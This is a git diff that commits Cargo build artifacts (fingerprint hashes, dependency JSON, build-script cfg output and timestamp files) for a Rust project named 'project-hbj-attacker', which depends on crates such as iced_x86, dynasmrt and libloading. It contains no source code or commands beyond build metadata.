+{"$message_type":"diagnostic","message":"4 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 4 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/dep-test-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/dep-test-lib-project_hbj_attacker
new file mode 100644
index 0000000..024be49
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/dep-test-lib-project_hbj_attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/test-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/test-lib-project_hbj_attacker
new file mode 100644
index 0000000..dba2b6a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/test-lib-project_hbj_attacker
@@ -0,0 +1 @@
+071c2731d3e255a3
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/test-lib-project_hbj_attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/test-lib-project_hbj_attacker.json
new file mode 100644
index 0000000..a5edd18
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/test-lib-project_hbj_attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":1436332732506357817,"profile":3316208278650011218,"path":10763286916239946207,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[7883780462905440460,"libloading",false,15801149763391923402],[11499138078358568213,"libc",false,1099485397091021021],[14034831750265444586,"ctor",false,15755893537085299923],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-e8cfde2a74014fc7/dep-test-lib-project_hbj_attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/bin-project-hbj-attacker
new file mode 100644
index 0000000..5e1ffb0
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/bin-project-hbj-attacker
@@ -0,0 +1 @@
+96dd8d0cb2cb3c69
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..e621ef1
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":8731458305071235362,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,16851255346335658477],[5150833351789356492,"nix",false,1524876878938899937],[11499138078358568213,"libc",false,6911773660789407732],[17285295483919976612,"dynasmrt",false,16634940951051159224]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..d714b7d
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-f90959a5e918ef02/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/build-script-build-script-build
new file mode 100644
index 0000000..a837728
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/build-script-build-script-build
@@ -0,0 +1 @@
+eb854826c8661407
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/build-script-build-script-build.json
new file mode 100644
index 0000000..d603740
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"proc-macro\"]","declared_features":"[\"default\", \"proc-macro\"]","target":17883862002600103897,"profile":2225463790103693989,"path":3229634504110745105,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/quote-63c10b5fc1327b7e/dep-build-script-build-script-build","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/dep-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/dep-build-script-build-script-build
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/dep-build-script-build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/quote-63c10b5fc1327b7e/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/dep-lib-quote b/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/dep-lib-quote
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/dep-lib-quote differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/lib-quote b/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/lib-quote
new file mode 100644
index 0000000..81d573f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/lib-quote
@@ -0,0 +1 @@
+3e20adc36700d6be
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/lib-quote.json b/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/lib-quote.json
new file mode 100644
index 0000000..aa988d0
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/quote-d24ddd1b0bd9b43a/lib-quote.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"proc-macro\"]","declared_features":"[\"default\", \"proc-macro\"]","target":3570458776599611685,"profile":2225463790103693989,"path":11108651733476741427,"deps":[[373107762698212489,"proc_macro2",false,18418728764669633043],[11082282709338087849,"build_script_build",false,9525455197692177399]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/quote-d24ddd1b0bd9b43a/dep-lib-quote","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-ddf20bb25101601c/run-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/quote-ddf20bb25101601c/run-build-script-build-script-build
new file mode 100644
index 0000000..950b413
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/quote-ddf20bb25101601c/run-build-script-build-script-build
@@ -0,0 +1 @@
+f72b57c608373184
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/quote-ddf20bb25101601c/run-build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/quote-ddf20bb25101601c/run-build-script-build-script-build.json
new file mode 100644
index 0000000..14d8c9e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/quote-ddf20bb25101601c/run-build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"","declared_features":"","target":0,"profile":0,"path":0,"deps":[[11082282709338087849,"build_script_build",false,510145667621488107]],"local":[{"RerunIfChanged":{"output":"debug/build/quote-ddf20bb25101601c/output","paths":["build.rs"]}}],"rustflags":[],"config":0,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/dep-lib-syn b/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/dep-lib-syn
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/dep-lib-syn differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/lib-syn b/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/lib-syn
new file mode 100644
index 0000000..1f2850b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/lib-syn
@@ -0,0 +1 @@
+778864758eabaeec
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/lib-syn.json b/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/lib-syn.json
new file mode 100644
index 0000000..344e976
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/syn-df895b4c5a72e2c4/lib-syn.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"clone-impls\", \"default\", \"derive\", \"extra-traits\", \"full\", \"parsing\", \"printing\", \"proc-macro\"]","declared_features":"[\"clone-impls\", \"default\", \"derive\", \"extra-traits\", \"fold\", \"full\", \"parsing\", \"printing\", \"proc-macro\", \"test\", \"visit\", \"visit-mut\"]","target":9442126953582868550,"profile":2225463790103693989,"path":12506057782539518430,"deps":[[373107762698212489,"proc_macro2",false,18418728764669633043],[3583063304925099847,"unicode_ident",false,11295519160116602642],[11082282709338087849,"quote",false,13751178957886922814]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/syn-df895b4c5a72e2c4/dep-lib-syn","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/dep-lib-unicode_ident b/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/dep-lib-unicode_ident
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/dep-lib-unicode_ident differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/lib-unicode_ident b/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/lib-unicode_ident
new file mode 100644
index 0000000..9aacf22
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/lib-unicode_ident
@@ -0,0 +1 @@
+12675e74d4bec19c
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/lib-unicode_ident.json b/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/lib-unicode_ident.json
new file mode 100644
index 0000000..2dc8227
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/lib-unicode_ident.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":5438535436255082082,"profile":2225463790103693989,"path":6087285280446124351,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/unicode-ident-f1c0f7cb8d2e950d/dep-lib-unicode_ident","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/invoked.timestamp b/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/output b/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/output
new file mode 100644
index 0000000..ce0c677
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/output
@@ -0,0 +1,24 @@
+cargo:rerun-if-changed=build.rs
+cargo:rerun-if-env-changed=RUST_LIBC_UNSTABLE_FREEBSD_VERSION
+cargo:rustc-cfg=freebsd12
+cargo:rerun-if-env-changed=RUST_LIBC_UNSTABLE_MUSL_V1_2_3
+cargo:rerun-if-env-changed=RUST_LIBC_UNSTABLE_LINUX_TIME_BITS64
+cargo:rerun-if-env-changed=RUST_LIBC_UNSTABLE_GNU_FILE_OFFSET_BITS
+cargo:rerun-if-env-changed=RUST_LIBC_UNSTABLE_GNU_TIME_BITS
+cargo:rustc-check-cfg=cfg(emscripten_old_stat_abi)
+cargo:rustc-check-cfg=cfg(espidf_time32)
+cargo:rustc-check-cfg=cfg(freebsd10)
+cargo:rustc-check-cfg=cfg(freebsd11)
+cargo:rustc-check-cfg=cfg(freebsd12)
+cargo:rustc-check-cfg=cfg(freebsd13)
+cargo:rustc-check-cfg=cfg(freebsd14)
+cargo:rustc-check-cfg=cfg(freebsd15)
+cargo:rustc-check-cfg=cfg(gnu_file_offset_bits64)
+cargo:rustc-check-cfg=cfg(gnu_time_bits64)
+cargo:rustc-check-cfg=cfg(libc_deny_warnings)
+cargo:rustc-check-cfg=cfg(libc_thread_local)
+cargo:rustc-check-cfg=cfg(linux_time_bits64)
+cargo:rustc-check-cfg=cfg(musl_v1_2_3)
+cargo:rustc-check-cfg=cfg(target_os,values("switch","aix","ohos","hurd","rtems","visionos","nuttx","cygwin"))
+cargo:rustc-check-cfg=cfg(target_env,values("illumos","wasi","aix","ohos","nto71_iosock","nto80"))
+cargo:rustc-check-cfg=cfg(target_arch,values("loongarch64","mips32r6","mips64r6","csky"))
diff --git a/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/root-output b/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/root-output
new file mode 100644
index 0000000..7d1981a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/root-output
@@ -0,0 +1 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/out
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/stderr b/01/project-hbj-attacker/target/debug/build/libc-5b9c6a9e0bfd637b/stderr
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build-script-build b/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build-script-build
new file mode 100755
index 0000000..63b3d1b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build_script_build-af26b483f3f56edc b/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build_script_build-af26b483f3f56edc
new file mode 100755
index 0000000..63b3d1b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build_script_build-af26b483f3f56edc differ
diff --git a/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build_script_build-af26b483f3f56edc.d b/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build_script_build-af26b483f3f56edc.d
new file mode 100644
index 0000000..308d8f7
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build_script_build-af26b483f3f56edc.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build_script_build-af26b483f3f56edc.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libc-0.2.177/build.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/libc-af26b483f3f56edc/build_script_build-af26b483f3f56edc: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libc-0.2.177/build.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libc-0.2.177/build.rs:
diff --git a/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build-script-build b/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build-script-build
new file mode 100755
index 0000000..a9f592f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build_script_build-05d246c86002f7b4 b/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build_script_build-05d246c86002f7b4
new file mode 100755
index 0000000..a9f592f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build_script_build-05d246c86002f7b4 differ
diff --git a/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build_script_build-05d246c86002f7b4.d b/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build_script_build-05d246c86002f7b4.d
new file mode 100644
index 0000000..0064e3c
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build_script_build-05d246c86002f7b4.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build_script_build-05d246c86002f7b4.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-05d246c86002f7b4/build_script_build-05d246c86002f7b4: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs:
diff --git a/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/invoked.timestamp b/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/output b/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/output
new file mode 100644
index 0000000..f844e8c
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/output
@@ -0,0 +1,25 @@
+cargo:rustc-check-cfg=cfg(android)
+cargo:rustc-check-cfg=cfg(dragonfly)
+cargo:rustc-check-cfg=cfg(ios)
+cargo:rustc-check-cfg=cfg(freebsd)
+cargo:rustc-check-cfg=cfg(illumos)
+cargo:rustc-check-cfg=cfg(linux)
+cargo:rustc-cfg=linux
+cargo:rustc-check-cfg=cfg(macos)
+cargo:rustc-check-cfg=cfg(netbsd)
+cargo:rustc-check-cfg=cfg(openbsd)
+cargo:rustc-check-cfg=cfg(solaris)
+cargo:rustc-check-cfg=cfg(watchos)
+cargo:rustc-check-cfg=cfg(tvos)
+cargo:rustc-check-cfg=cfg(visionos)
+cargo:rustc-check-cfg=cfg(apple_targets)
+cargo:rustc-check-cfg=cfg(bsd)
+cargo:rustc-check-cfg=cfg(bsd_without_apple)
+cargo:rustc-check-cfg=cfg(linux_android)
+cargo:rustc-cfg=linux_android
+cargo:rustc-check-cfg=cfg(freebsdlike)
+cargo:rustc-check-cfg=cfg(netbsdlike)
+cargo:rustc-check-cfg=cfg(solarish)
+cargo:rustc-check-cfg=cfg(fbsd14)
+cargo:rustc-check-cfg=cfg(qemu)
+cargo:rustc-check-cfg=cfg(target_os, values("cygwin"))
diff --git a/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/root-output b/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/root-output
new file mode 100644
index 0000000..29333ff
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/root-output
@@ -0,0 +1 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/out
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/stderr b/01/project-hbj-attacker/target/debug/build/nix-4bd4a1f74f0bb075/stderr
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build-script-build b/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build-script-build
new file mode 100755
index 0000000..6c9e68f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build_script_build-67a07a9a08f386cd b/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build_script_build-67a07a9a08f386cd
new file mode 100755
index 0000000..6c9e68f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build_script_build-67a07a9a08f386cd differ
diff --git a/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build_script_build-67a07a9a08f386cd.d b/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build_script_build-67a07a9a08f386cd.d
new file mode 100644
index 0000000..306a006
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build_script_build-67a07a9a08f386cd.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build_script_build-67a07a9a08f386cd.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-67a07a9a08f386cd/build_script_build-67a07a9a08f386cd: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs:
diff --git a/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/invoked.timestamp b/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/output b/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/output
new file mode 100644
index 0000000..f844e8c
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/output
@@ -0,0 +1,25 @@
+cargo:rustc-check-cfg=cfg(android)
+cargo:rustc-check-cfg=cfg(dragonfly)
+cargo:rustc-check-cfg=cfg(ios)
+cargo:rustc-check-cfg=cfg(freebsd)
+cargo:rustc-check-cfg=cfg(illumos)
+cargo:rustc-check-cfg=cfg(linux)
+cargo:rustc-cfg=linux
+cargo:rustc-check-cfg=cfg(macos)
+cargo:rustc-check-cfg=cfg(netbsd)
+cargo:rustc-check-cfg=cfg(openbsd)
+cargo:rustc-check-cfg=cfg(solaris)
+cargo:rustc-check-cfg=cfg(watchos)
+cargo:rustc-check-cfg=cfg(tvos)
+cargo:rustc-check-cfg=cfg(visionos)
+cargo:rustc-check-cfg=cfg(apple_targets)
+cargo:rustc-check-cfg=cfg(bsd)
+cargo:rustc-check-cfg=cfg(bsd_without_apple)
+cargo:rustc-check-cfg=cfg(linux_android)
+cargo:rustc-cfg=linux_android
+cargo:rustc-check-cfg=cfg(freebsdlike)
+cargo:rustc-check-cfg=cfg(netbsdlike)
+cargo:rustc-check-cfg=cfg(solarish)
+cargo:rustc-check-cfg=cfg(fbsd14)
+cargo:rustc-check-cfg=cfg(qemu)
+cargo:rustc-check-cfg=cfg(target_os, values("cygwin"))
diff --git a/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/root-output b/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/root-output
new file mode 100644
index 0000000..0a5162f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/root-output
@@ -0,0 +1 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/out
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/stderr b/01/project-hbj-attacker/target/debug/build/nix-bfbd0f7d1e241912/stderr
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/invoked.timestamp b/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/output b/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/output
new file mode 100644
index 0000000..f844e8c
--- /dev/null
